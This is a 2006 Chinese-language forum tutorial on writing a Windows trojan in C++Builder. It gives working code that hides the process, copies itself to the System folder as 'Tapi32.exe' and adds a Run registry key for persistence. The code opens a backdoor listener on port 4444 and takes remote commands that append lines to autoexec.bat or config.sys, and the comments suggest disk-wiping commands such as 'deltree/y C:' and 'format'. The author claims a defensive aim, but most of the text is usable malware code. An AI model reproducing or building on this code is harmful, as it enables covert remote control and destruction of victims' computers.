木馬是如何編寫的 - 史萊姆論壇

KERNEL32.DLL中的鳥函數了。

... 管理器可以對當繼續程一覽無餘，因此沒必要在WinNt下也使用以上程式碼（不過你可以使用其他的方法， 這個留到後面再講）。

  史萊姆論壇 >教學文件資料庫 >Hacker/Cracker及加解密技術文件 木馬是如何編寫的 會員帳號 記住訊息 密碼 忘記密碼? 論壇說明 標記討論區已讀 歡迎您來到『史萊姆論壇』^___^ 您目前正以訪客的身份瀏覽本論壇，訪客所擁有的權限將受到限制，您可以瀏覽本論壇大部份的版區與文章，但您將無法參與任何討論或是使用私人訊息與其他會員交流。

若您希望擁有完整的使用權限，請註冊成為我們的一份子，註冊的程序十分簡單、快速，而且最重要的是－－註冊是完全免費的！ 請點擊這裡：『註冊成為我們的一份子！』 Google提供的廣告     主題工具 顯示模式 2006-03-21,10:59AM   #1 psac 榮譽會員   榮譽勳章 勳章總數19 UID-3662 在線等級: 註冊日期:2002-12-07 住址:木柵市立動物園 文章:17381 精華:2 現金:5253金幣 資產:33853金幣 木馬是如何編寫的 木馬是如何編寫的 特洛依木馬這個名詞大家應該不陌生，自從98年「死牛崇拜」黑客小組公佈BackOrifice以來，木馬猶如 平地上的驚雷，使在Dos——Windows時代中長大的中國線人從五彩繽紛的網路之夢中驚醒，終於認識到 的網路也有它邪惡的一面，一時間人心惶惶。

　　我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著 覺、上不了網，到處求救！要知道，木馬（Trojan）的歷史是很悠久的：早在AT&TUnix和BSDUnix十分 盛行的年代，木馬是由一些玩程式（主要是C）水準很高的年輕人（主要是老美）用C或Shell語言編寫的 ，基本是用來竊取登入主機的密碼，以取得更高的權限。

那時木馬的主要方法是誘騙——先修改你 的.profile文件，植入木馬；當你登入時將你敲入的密碼字串存入一個文件，用Email的形式發到攻擊者 的郵信箱裡。

國內的年輕人大都是在盜版Dos的熏陶下長大的，對網路可以說很陌生。

直到Win9x橫空出世， 尤其是WinNt的普及，大大推動了網路事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可 以說是簡陋的木馬（甚至在Win9x的「關閉程序」對話視窗可以看到工作）給了當時中國人極大的震撼，它 在中國的網路安全方面可以說是一個劃時代的軟體。

　　自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成——伺服器程序（Server）和客戶 端程序（Client），伺服器負責開啟攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一 定的網路傳輸協定來進行通訊（一般是TCP/IP傳輸協定）。

為了讓大家更好的瞭解木馬攻擊技術，破除木馬的神秘 感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和 未知的木馬。

　　首先是編程工具的選項。

目前流行的開發工具有C++Builder、VC、VB和Delphi，這裡我們選用 C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太複雜，為了更好地突出我的例子，集中注意力在木 馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如「死牛崇拜 」黑客小組公佈的BO2000來源碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談——難道你還給受害者 傳一個1兆多的動態連接庫——Msvbvm60.dll嗎？ 啟動C++Builder5.0企業版，新增一個工程，增加三個VCL控件：一個是Internet頁中的ServerSocket， 另兩個是Fastnet頁中的NMFTP和NMSMTP。

ServerSocket的功能是用來使本程序變成一個伺服器程序，可 以對外服務（對攻擊者敞開大門）。

Socket最初是在Unix上出現的，後來微軟將?o?憡w薟indows中（包括 Win98和WinNt）；後兩個控件的作用是用來使程序具有FTP（FileTransferProtocol文件傳輸傳輸協定）和 SMTP（SimpleMailTransferProtocol簡單郵件傳輸傳輸協定）功能，大家一看都知道是使軟體具有上傳下 載功能和發郵件功能的控件。

　　Form表單是可視的，這當然是不可思議的。

不光佔去了大量的空間（光一個Form就有300K之大），而 且使軟體可見，根本沒什麼作用。

因此實際寫木馬時可以用一些技巧使程序不包含Form，就像Delphi用過 程實現的小程序一般只有17K左右那樣。

　　我們首先應該讓我們的程序能夠隱身。

雙按Form，首先在FormCreate事件中增加可使木馬在Win9x的 「關閉程序」對話視窗中隱藏的程式碼。

這看起來很神秘，其實說穿了不過是一種被稱之為Service的後台進 程,它可以執行在較高的優先等級下,可以說是非常靠近系統核心的設備驅動程式中的那一種。

因此，只要將 我們的程序在工作資料庫中用RegisterServiceProcess（）函數註冊成服務工作（ServiceProcess）就 可以了。

不過該函數的宣告在Borland預先打包的頭文件中沒有，那麼我們只好自己來宣告這個位於 KERNEL32.DLL中的鳥函數了。

　　首先判斷目標機的作業系統是Win9x還是WinNt： { DWORDdwVersion=GetVersion（）; //得到作業系統的版本號 if（dwVersion>=0x80000000） //作業系統是Win9x，不是WinNt 　{ 　　typedefDWORD（CALLBACK*LPREGISTERSERVICEPROCESS）（DWORD,DWORD）; 　　　　//定義RegisterServiceProcess（）函數的原型 　　　　HINSTANCEhDLL; 　　　LPREGISTERSERVICEPROCESSlpRegisterServiceProcess; 　　　hDLL=LoadLibrary（"KERNEL32"）; 　　　//載入RegisterServiceProcess（）函數所在的動態連接庫KERNEL32.DLL 　　lpRegisterServiceProcess=（LPREGISTERSERVICEPROCESS）GetProcAddress （hDLL,"RegisterServiceProcess"）; 　　　　//得到RegisterServiceProcess（）函數的位址 　　　　lpRegisterServiceProcess（GetCurrentProcessId（）,1）; 　　　//執行RegisterServiceProcess（）函數,隱藏本工作 　　　FreeLibrary（hDLL）; 　　　//卸載動態連接庫 　} } 　　這樣就終於可以隱身了（害我敲了這麼多程式碼！）。

為什麼要判斷作業系統呢？因為WinNt中的工作 管理器可以對當繼續程一覽無餘，因此沒必要在WinNt下也使用以上程式碼（不過你可以使用其他的方法， 這個留到後面再講）。

接著再將自己拷貝一份到%System%目錄下，例如：C:\Windows\System，並修改註冊表，以便啟動時自動 載入： {　 charTempPath[MAX_PATH]; //定義一個變數 GetSystemDirectory（TempPath,MAX_PATH）; //TempPath是system目錄緩衝區的位址,MAX_PATH是緩衝區的大小，得到目標機的System目錄路徑 SystemPath=AnsiString（TempPath）; //格式化TempPath字串串，使之成為能供編譯器使用的樣式 CopyFile（ParamStr（0）.c_str（）,AnsiString（SystemPath+"\\Tapi32.exe"）.c_str（）,FALSE ）; //將自己拷貝到%System%目錄下，並改名為Tapi32.exe，偽裝起來 Registry=newTRegistry; //定義一個TRegistry對象，準備修改註冊表，這一步必不可少 Registry->RootKey=HKEY_LOCAL_MACHINE; //設定主鍵為HKEY_LOCAL_MACHINE Registry->OpenKey（"Software\\Microsoft\\Windows\\ CurrentVersion\\Run",TRUE）; //開啟鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就新增之 try 　{ 　　//如果以下語句發生異常，跳至catch，以避免程序崩潰 　　if（Registry->ReadString（"crossbow"）!=SystemPath+"\\Tapi32.exe"） 　　　Registry->WriteString（"crossbow",SystemPath+"\\Tapi32.exe"）; 　　　//尋找是否有「crossbow」字樣的鍵值，並且是否為拷貝的目錄%System%+Tapi32.exe 　　　//如果不是，就寫入以上鍵值和內容 　} catch（...） 　{ 　//如果有錯誤，什麼也不做 　} } 　　好，FormCreate程序完成了，這樣每次啟動都可以自動載入Tapi32.exe，並且在「關閉程序」對話視窗 中看不見本工作了，木馬的雛形初現。

　　接著選ServerSocket控件，在左邊的ObjectInspector中將Active改為true，這樣程序一啟動就打 開特定連接阜，處於伺服器工作狀態。

再將Port填入4444，這是木馬的連接阜號，當然你也可以用別的。

但是 你要注意不要用1024以下的低端連接阜，因為這樣不但可能會與基本網路傳輸協定使用的連接阜相衝突，而且很容 易被發覺，因此盡量使用1024以上的高端連接阜（不過也有這樣一種技術，它故意使用特定連接阜，因為如果 引起衝突，Windows也不會報告錯誤^_^）。

你可以看一看TNMFTP控件使用的連接阜，是21號連接阜，這是FTP傳輸協定 的專用控制連接阜（FTPControlPort）；同理TNMSMTP的25號連接阜也是SMTP傳輸協定的專用連接阜。

　　再選ServerSocket控件，點擊Events頁，雙按OnClientRead事件，敲入以下程式碼： { 　FILE*fp=NULL; 　char*content; 　inttimes_of_try; 　charTempFile[MAX_PATH]; 　//定義了一堆待會兒要用到的變數 　sprintf（TempFile,"%s",AnsiString（SystemPath+AnsiString（"\\Win369.BAT"））.c_str（）） ; 　//在%System%下建立一個文本文件Win369.bat，作為臨時文件使用 　AnsiStringtemp=Socket->ReceiveText（）; 　//接收客戶端（攻擊者，也就是你自己）傳來的資料 } 好，大門敞開了！接著就是修改目標機的各種組態了！^_^首先我們來修改Autoexec.bat和Config.sys吧 ： { if（temp.SubString（0,9）=="editconf"） 　//如果接受到的字串串的前9個字串是「editconf」 　{ 　　　intnumber=temp.Length（）; 　　　//得到字串串的長度 　　　intfile_name=atoi（（temp.SubString（11,1））.c_str（））; 　　　//將第11個字串轉換成integer型，存入file_name變數 　　　//為什麼要取第11個字串，因為第10個字串是空格字串 　　　content=（temp.SubString（12,number-11）+'\n'）.c_str（）; 　　　//餘下的字串串將被作為寫入的內容寫入目標文件 　　　FILE*fp=NULL; 　　　charfilename[20]; 　　　chmod（"c:\\autoexec.bat",S_IREAD|S_IWRITE）; 　　　chmod（"c:\\config.sys",S_IREAD|S_IWRITE）; 　　　//將兩個目標文件的內容改為可讀可寫 　　　if（file_name==1） 　　　　sprintf（filename,"%s","c:\\autoexec.bat"）; 　　　　//如果第11個字串是1,就把Autoexec.bat格式化 　　　elseif（file_name==2） 　　　　sprintf（filename,"%s","c:\\config.sys"）; 　　　　//如果第11個字串是1,就把Config.sys格式化 　　　times_of_try=0; 　　//定義計數器 　　　while（fp==NULL） 　　　　{ 　　　　　//如果游標是空 　　　　fp=fopen（filename,"a+"）; 　　　　//如果文件不存在，新增之；如果存在，準備在其後增加 　　　　//如果出現錯誤，文件游標為空，這樣就會重複 　　　　times_of_try=times_of_try+1; 　　　　//計數器加1 　　　　if（times_of_try>100） 　　　　{ 　　　　　　//如果已經試了100次了，仍未成功 　　　　　　Socket->SendText（"FailByOpenFile"）; 　　　　　　//就發回「FailByOpenFile」的錯誤訊息 　　　　　　gotoEND; 　　　　　　//跳至END處 　　　　} 　　　　} 　　　fwrite（content,sizeof（char）,strlen（content）,fp）; 　　　//寫入增加的語句，例如deltree/yC:或者format/q/autotestC:，夠毒吧？！ 　　　fclose（fp）; 　　　//寫完後關閉目標文件 　　　Socket->SendText（"Sucess"）; 　　　//然後發回「Success」的成功訊息 　} } 　　你現在可以通過網路來察看目標機上的這兩個文件了，並且還可以向裡面隨意增加任何指令。

哈哈， 這只不過是牛刀小試罷了。

朋友，別走開！ __________________   送花文章:3, 收花文章:1631篇,收花:3205次 psac 查看公開訊息 查尋psac發表的更多文章   « 上一主題 | 下一主題 » 主題工具 顯示可列印版本 郵寄本頁給好友 顯示模式 平板模式 切換到混合模式 切換到樹形模式 發表規則 您不可以發文 您不可以回覆主題 您不可以上傳附加檔案 您不可以編輯您的文章 論壇啟用BB語法 論壇啟用表情符號 論壇啟用[IMG]語法 論壇禁用HTML語法Trackbacksare禁用 Pingbacksare禁用 Refbacksare禁用 所有時間均為台北時間。

現在的時間是07:11AM。

《史萊姆的第一個家》- 論壇存檔- 返回頂端 PoweredbyvBulletin®版本3.6.8版權所有©2000-2022,JelsoftEnterprisesLtd. 『服務條款』*有問題不知道該怎麼解決嗎？請聯絡本站的系統管理員* SEObyvBSEO3.6.1